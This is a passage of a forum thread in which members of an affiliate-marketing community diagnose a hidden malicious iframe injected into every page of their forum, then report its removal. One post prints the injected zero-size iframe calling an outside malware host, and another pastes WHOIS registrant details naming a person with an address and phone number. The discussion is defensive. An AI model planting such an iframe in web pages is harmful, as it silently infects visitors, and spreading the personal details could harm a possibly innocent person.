|
|||||||
| Shooting The Shit Anything goes, seriously. Come meet and network with your peers, it's a fun way to take a break out of your busy day of posting at other boring forums. |
|
Welcome to the WickedFire - Affiliate Marketing Forum - Internet Marketing Webmaster SEO Forum forums. You are currently viewing our boards as a guest which gives you limited access to view most discussions and access our other features. By joining our free community you will have access to post topics, communicate privately with other members (PM), respond to polls, upload content and access many other special features. Registration is fast, simple and absolutely free so please, join our community today! If you have any problems with the registration process or your account login, please contact contact us. |
![]() |
|
|
LinkBack | Thread Tools | Display Modes |
|
|
#10 (permalink) |
|
Senior Member
|
Found it...
Code:
<pre class="alt2" dir="ltr" style="
margin: 0px;
padding: 6px;
border: 1px inset;
width: 640px;
height: 34px;
text-align: left;
overflow: auto"><iframe src="http://naemnitibo.in/cn.php?hyc" width="0" height="0"></iframe></pre>
Domain Name:NAEMNITIBO.IN Created On:18-May-2009 15:34:44 UTC Last Updated On:18-May-2009 15:37:31 UTC Expiration Date:18-May-2010 15:34:44 UTC Sponsoring Registrar:Web Commerce Communications Limited dba WebNic.cc (R105-AFIN) Status:TRANSFER PROHIBITED Registrant ID:WN13571799T Registrant Name:Alexander Kalinin Registrant Organization:Private person Registrant Street1:ulitsa Dolskaya d.10 kv.33 Registrant Street2: Registrant Street3: Registrant City:Moskva Registrant State/Province:Moskva Registrant Postal Code:115569 Registrant Country:RU Registrant Phone:+7.49573431510 Registrant Phone Ext.: Registrant FAX:+0.0 Registrant FAX Ext.: Registrant Email:[email protected] Admin ID:WN13571800T Admin Name:Alexander Kalinin Admin Organization:Private person Admin Street1:ulitsa Dolskaya d.10 kv.33 Admin Street2: Admin Street3: Admin City:Moskva Admin State/Province:Moskva Admin Postal Code:115569 Admin Country:RU Admin Phone:+7.49573431510 Admin Phone Ext.: Admin FAX:+0.0 Admin FAX Ext.: Admin Email:[email protected] Tech ID:WN13571801T Tech Name:Alexander Kalinin Tech Organization:Private person Tech Street1:ulitsa Dolskaya d.10 kv.33 Tech Street2: Tech Street3: Tech City:Moskva Tech State/Province:Moskva Tech Postal Code:115569 Tech Country:RU Tech Phone:+7.49573431510 Tech Phone Ext.: Tech FAX:+0.0 Tech FAX Ext.: Tech Email:[email protected] Name Server:NS1.NAEMNITIBO.IN Name Server:NS2.NAEMNITIBO.IN
__________________
|
|
|
|
|
#12 (permalink) | |
|
Senior Member
|
No problems here, WickedFire teh hacked eh!
__________________
Quote:
|
|
|
|
|
|
#13 (permalink) |
|
Senior Member
|
texic, do you have an AV installed? If not, you could easily be infected with whatever this guys pushing around. Download FREE antivirus software - avast! Home Edition
__________________
|
|
|
|
|
#14 (permalink) |
|
Senior Member
|
I will ping Jon or Stanley if no one's done it yet... and FF is not detecting any errors.
__________________
Whatever you do - do NOT milk the bull! "Pickles of Thunder!" - still in development... "Put some thunder in your pickle!" - Buy Viagra today! Ebooks - virtual content guaranteed to make you a virtual billionaire....virtually... |
|
|
|
|
#16 (permalink) |
|
PedoBeard
|
yea i'm getting it on every page of wf on safari 4, basically the embeded url got it flagged as a malware site by association.
__________________
Twitter Facebook Blog IonVz - Managed VPS (starting at 34.99/month) and Shared (39.99/year) hosting. Directadmin only $10(non-recurring/one-time). We manage Nginx webservers. Why Nginx?I can Fix, Slice, Configure or Install your Site/Server |
|
|
|
|
#17 (permalink) |
|
Member
|
my girlfriend's sites got infected recently with something similar (was javascript, not iframes though)
i researched it and basically there is spyware out there that sits idol on people's home computers monitoring FTP ports and sending username/passwords whenever someone logs into an FTP... basic ftp connections aren't encrypted. it's better to use sftp. i cleaned her computer of everything, changed her passwords, and had her switch to sftp before I could get the code to stop popping up every night. i don't know if that's the problem here, but just a suggestion. i searched for 2-3 days before i figured out that her problems weren't holes in her php scripts or server side stuff.... |
|
|
|
|
#18 (permalink) | |
|
Mоderatоr
|
Here's Google's diagnostic page about that website: Google Safe Browsing diagnostic page for naemnitibo.in
__________________
Quote:
|
|
|
|
|
|
#20 (permalink) |
|
Support: +1(347) 417-5786
|
I have AVG Internet Security & using Firefox and getting no errors ! is it fixed ?
__________________
Over 1400 reviews posted for my 100 Dofollow Social Bookmarking Service : $19/URL (3 sites only per social bookmarking account). - PM me for discounts on BULK orders. |
|
|
|
|
#21 (permalink) | ||
|
Mоderatоr
|
Quote:
But Firefox has that website on automatic block, so it won't access it without your consent.
__________________
Quote:
|
||
|
|
|
|
#22 (permalink) | ||
|
PedoBeard
|
Quote:
Quote:
__________________
Twitter Facebook Blog IonVz - Managed VPS (starting at 34.99/month) and Shared (39.99/year) hosting. Directadmin only $10(non-recurring/one-time). We manage Nginx webservers. Why Nginx?I can Fix, Slice, Configure or Install your Site/Server |
||
|
|
|
|
#23 (permalink) |
|
PedoBeard
|
You know, I honestly thought that WF got flagged due to makemoniesonline.com and people who keep thinking its malware... shame my expectations were a bust.
__________________
Twitter Facebook Blog IonVz - Managed VPS (starting at 34.99/month) and Shared (39.99/year) hosting. Directadmin only $10(non-recurring/one-time). We manage Nginx webservers. Why Nginx?I can Fix, Slice, Configure or Install your Site/Server |
|
|
|
|
#25 (permalink) | ||
|
Mоderatоr
|
Quote:
If you take a look into the source code of every page on Wickedfire now, you'll see that an iframe has been imprinted, which loads naemnitibo.in. Maybe it is a bug that has been exploited. The forums over at DevShed have also been attacked by this fuck (see this thread).
__________________
Quote:
|
||
|
|
|
|
#26 (permalink) | |
|
PedoBeard
|
Quote:
If it's an iframe, firefox has the warning shown within the iframe itself, as opposed to the parent frame.
__________________
Twitter Facebook Blog IonVz - Managed VPS (starting at 34.99/month) and Shared (39.99/year) hosting. Directadmin only $10(non-recurring/one-time). We manage Nginx webservers. Why Nginx?I can Fix, Slice, Configure or Install your Site/Server |
|
|
|
|
|
#32 (permalink) |
![]() |
I'll let Jon know.
__________________
AdHustler.com - Every Day I'm Hustlin'
|
|
|
|
|
#34 (permalink) |
![]() |
Stanley took care of it. Thx for letting us know.
__________________
"Let me tell you what Melba Toast is packin' right here, all right. We got 4:11 Positrac outback, 750 double pumper, Edelbrock intake, bored over 30, 11 to 1 pop-up pistons, turbo-jet 390 horsepower. We're talkin' some fuckin' muscle." - Wooderson |
|
|
|
|
#37 (permalink) |
![]() |
Hahahaha!
__________________
"Let me tell you what Melba Toast is packin' right here, all right. We got 4:11 Positrac outback, 750 double pumper, Edelbrock intake, bored over 30, 11 to 1 pop-up pistons, turbo-jet 390 horsepower. We're talkin' some fuckin' muscle." - Wooderson |
|
|
|
|
#39 (permalink) | |
![]() |
Quote:
The place is a bulletproof hosting provider. The only other trail I could see goes to the UK, but the name is "Oleg Orlov"...some human rights politician in Russia. So it's probably just them fucking around. I could get a little deeper in, but honestly it's a pain in the ass since I can't just visit the URLs. |
|
|
|
|
|
#41 (permalink) |
|
Senior Member
|
ahhh I was hoping this was a digital point type of move where they put 20 iframes per page with amazon, ebay, and other affiliate cookies. I never did get a warning using firefox and AVG on this one though and AVG is usually pretty touchy on iframes.
|
|
|
|
|
#45 (permalink) | |
|
Senior Member
|
Quote:
Seriously if you got infected with it consider wiping your hard drive there is no telling what they bundled that crap with. Undetected password stealers are a dime a dozen and if you manage your servers from the same computer there is a fair chance you will have your passwords stolen for them and similar malicious code placed on your sites. |
|
|
|
|
|
#46 (permalink) | |
|
Senior Member
|
Quote:
__________________
|
|
|
|
|
|
#47 (permalink) | |
![]() |
Quote:
No way to tell who's a real person in Russia. No way to tell if the non-russian names are real. Or stolen. There's a lot more nastiness coming from these guys. It's a minefield trying to find them. And also, there's certain people you just don't out. |
|
|
|
![]() |
| Thread Tools | |
| Display Modes | |
|
|
Similar Threads
|
||||
| Thread | Thread Starter | Forum | Replies | Last Post |
| Where WickedFire took you or can take you !? | NYDAz | Shooting The Shit | 19 | 09-26-2008 01:24 AM |
| New WickedFire Report | Jon | Shooting The Shit | 38 | 11-21-2007 06:04 AM |
| matt Cutts: how google handles malware..very informative | Armpitpatal | Affiliate Marketing | 4 | 05-21-2007 04:56 PM |